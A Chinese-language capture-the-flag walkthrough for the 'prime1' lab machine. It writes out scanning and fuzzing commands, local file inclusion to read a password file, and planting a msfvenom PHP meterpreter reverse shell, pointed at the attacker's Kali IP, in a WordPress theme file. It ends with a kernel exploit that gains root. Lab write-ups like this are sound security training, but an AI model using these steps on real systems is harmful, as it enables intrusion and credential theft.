靶机:prime1
主机发现
kali使用命令arp-scan -l,发现靶机ip地址为192.168.138.142
使用namp 扫描目标靶机端口,发现其开放端口为22和80
数据库
浏览器访问192.168.138.142,查看页面源代码后无有用信息
kali使用dirb扫描目标靶机ip,获得其目录信息,dev,index,wordpress
访问dev文件获得信息,无有用信息
再次在kali中使用dirb扫描指定后缀名文件,获得信息
dirb http://192.168.138.142 -X .txt,.php,.zip
查看secret.txt文件下内容,提供需要使用fuzz工具以及找到location.txt信息
在kali中使用wfuzz工具扫描url参数,获得其参数为file
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 "http://192.168.138.142/index.php?FUZZ"
结合上一步获得的location.txt,访问192.168.138.142/index.php?file=location.txt
获得需要使用secrettier360参数访问其他php文件,在index.php使用secrettier360参数访问无结果后,在image.php中使用得到正确返回结果
使用其参数查看敏感文件
在用户描述中得到提示saket:x:1001:1001:find password.txt file in my directory:/home/saket
在浏览器中访问192.168.138.142/image.php?secrettier360=/home/saket/password.txt,获得密码
使用密码登录其目标靶机,登录失败
浏览器访问目标靶机的wordpress,使用用户名和得到的密码登录后台
在主题编辑器(利用点)中,appearance-theme editor-secret.php
考虑使用php代码反弹shell
msf提权
使用msfvenom生成payload,获得payload文件,其中lhost为kali ip
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.138.130 lport=7777 -o shell.php
kali启动msfconsole,启动一个端口监听利用
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.138.130
set lport 7777
exploit
监听已开启,将生成的shell代码放入主题编辑器中
浏览器访问此文件,192.168.138.142/ wordpress/wp-content/themes/twentynineteen/secret.php
在kali查看已成功链接
查看操作系统版本
进入msfconsole查找版本漏洞
进入对应目录,复制脚本文件
编译并得到可执行文件
上传文件到靶机
输入shell进入shell,执行45010文件, whoami查看用户,已成为root用户
成功获得flag